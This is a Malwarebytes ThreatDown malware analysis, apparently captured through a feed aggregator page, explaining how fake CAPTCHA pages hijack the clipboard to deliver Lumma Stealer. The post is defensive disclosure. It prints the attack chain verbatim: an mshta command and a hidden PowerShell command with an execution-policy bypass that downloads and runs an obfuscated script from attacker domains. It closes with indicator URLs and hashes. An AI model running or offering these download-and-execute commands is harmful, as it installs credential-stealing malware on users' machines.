惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Engineering at Meta
Engineering at Meta
博客园_首页
H
Help Net Security
WordPress大学
WordPress大学
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
罗磊的独立博客
博客园 - 三生石上(FineUI控件)
B
Blog
I
InfoQ
SecWiki News
SecWiki News
T
Tailwind CSS Blog
Spread Privacy
Spread Privacy
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
V
Vulnerabilities – Threatpost
N
Netflix TechBlog - Medium
P
Palo Alto Networks Blog
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Vercel News
Vercel News
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
K
Kaspersky official blog
M
MIT News - Artificial intelligence
S
Schneier on Security
T
Threat Research - Cisco Blogs
F
Fortinet All Blogs
Cyberwarzone
Cyberwarzone
Scott Helme
Scott Helme
aimingoo的专栏
aimingoo的专栏
Martin Fowler
Martin Fowler
MyScale Blog
MyScale Blog
The Cloudflare Blog
Recent Announcements
Recent Announcements
Security Latest
Security Latest
G
GRAHAM CLULEY
IT之家
IT之家
Y
Y Combinator Blog
The Last Watchdog
The Last Watchdog
腾讯CDC
Google DeepMind News
Google DeepMind News
V
V2EX
S
Securelist
TaoSecurity Blog
TaoSecurity Blog
B
Blog RSS Feed
S
SegmentFault 最新的问题
博客园 - 叶小钗
P
Proofpoint News Feed
云风的 BLOG
云风的 BLOG
Project Zero
Project Zero
G
Google Developers Blog
Google DeepMind News
Google DeepMind News
F
Full Disclosure

Threat Walkthroughs – ThreatDown by Malwarebytes

Fake Booking.com emails target hotels Phishers go “interplanetary” to get company login credentials “Enhanced Bonus” QR code phish steals Microsoft credentials USB worms: Still wriggling on to under-protected computers after all these years Analyzing a Mispadu Trojan’s attack chain Web shop spreads SocGolish malware and steals credit cards Clipboard hijacker tries to install a Trojan A visit to a print shop put a password stealer on a co-worker’s laptop Watch out! Mobidash Android adware spread through phishing and online links
How a clipboard hijacker delivers Lumma Stealer - ThreatDown by Malwarebytes
Pieter Arntz · 2025-01-27 · via Threat Walkthroughs – ThreatDown by Malwarebytes
Clipboard icon

The use of fake Captcha websites has doubled in only a few months.

Cybercriminal tactics ebb and flow over time, depending on environmental factors, the preferences of the groups involved, and what’s making money. Right now, criminals are showing renewed enthusiasm for clipboard hijacking and fake CAPTCHAs, a tactic that fools users into pasting malicious code into their computers.

Earlier this month, we described in detail how cybercriminals used clipboard hijacking to infect website visitors with a Trojan. The attack relied on a CAPTCHA lookalike with instructions that paste the clipboard contents into a command line.

fake Captcha with instructions
A fake CAPTCHA used in a clipboard hijacking attack

The fake CAPTCHA instructions are found on all kinds of websites, but mostly fake web shops, news sites, and websites offering media like music and movies.

As researchers from ReliaQuest recently pointed out, the number of fake CAPTCHA pages nearly doubled from September 2024 to December 2024. And it’s not just criminals spreading Remote Access Trojans and information stealers any more—advanced threat actors like APT28 (aka Fancy Bear) are successfully employing these tactics as well.

So, we decided to dive a bit deeper into the tactics, techniques, and procedures (TTPs) behind these attacks.

Our Managed Detection & Response (MDR) team soon found an example where cybercriminals tried to infect one of our customers with Lumma Stealer malware.

The website tried to load the following command into the victim’s clipboard. Executing the instructions on the fake CAPTCHA would have pasted it into a command line and run it.

mshta https://eprime.shop/s6.mp3 ''I am not a robot - reCAPTCHA Verification ID: 2165

The command uses a trusted utility, MSHTA, to download an encoded PowerShell script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Enc JABkAFEAQwa2AEYAbgB4AHAAOQBDAHkaZAA4AEwATgBTAGMARwBqAFoAVABCAG...BHAF0AOgA6AEEAUwBDAEkASQAkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=
  • The -w 1 switch ensures the PowerShell window isn’t visible when the script runs.
  • The Enc switch indicates that the following command is encoded in Base64 format.

Effectively, this script downloads a very obfuscated PowerShell script called Nusku.jpeg.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command'iex((New-Object System.Net.WebClient).DownloadString('https://n.kliphirofey.shop/Nusku.jpeg'))'
  • The ep bypass switch allows PowerShell to execute scripts without any restrictions, ignoring the current execution policy settings.
  • The -nop switch prevents PowerShell from loading the user profile scripts when starting. This can speed up the startup time and also avoids any potential interference from user-specific configurations or scripts that might be set in the profile.
  • The -Command switch indicates that what follows will be a command or script to execute directly in PowerShell.

The script hidden in Nusku.jpeg contains numerous complex mathematical operations and variable assignments, which obscure its purpose, and it includes several while loops and conditional statements that control the flow of execution based on the values of the variables. The main reason for the complexity is to avoid reverse engineering and sandbox analysis, which can give up if it takes too long to unwind.

Thankfully, one of our researchers spotted the significant part of the script. A function called fdsjnh.

This function decodes a Base64-encoded string that has been obfuscated through character manipulation and XOR encryption. The key steps involve creating an ArrayList from a string, decoding it from Base64, and then decrypting it using an XOR operation with another byte array derived from a hardcoded string.

Manually, you would have to de-obfuscate this script by looking for repeated calculations and see if they can be simplified, and then break down the complex expressions into simpler, more readable forms.

But with the help from the researcher, putting a breakpoint on the return expression of the fdsjnh function did the job. (The variable $kcuVdyrjJenvYgEdy contains the second script.)

This script turned out to be responsible for loading and executing a Portable Executable (PE) payload—Lumma Stealer—in memory, although it could be used to drop any type of malware in the memory of an affected system.

IOCs

https://findinmind[.]com/play.html
https://eprime[.]shop/s6.mp3
https://echoicedeals[.]shop/s6.mp3
https://etrademart[.]shop/s6.mp3
https://sharethewebs[.]shop/s5.swf
https://pomppie[.]shop/RUKE.mp4
https://n.kliphirofey[.]shop/Nusku.jpeg
4bd70b088c9c5aa80506a06c10f0d3ad27762bd04f6354cd8c9d9ee061cb41b7 (Nusku.jpeg)
53b7bfacc441837432f32613646fb10de2bb3c621d1c9835efaceb9e63a1d099 (payload)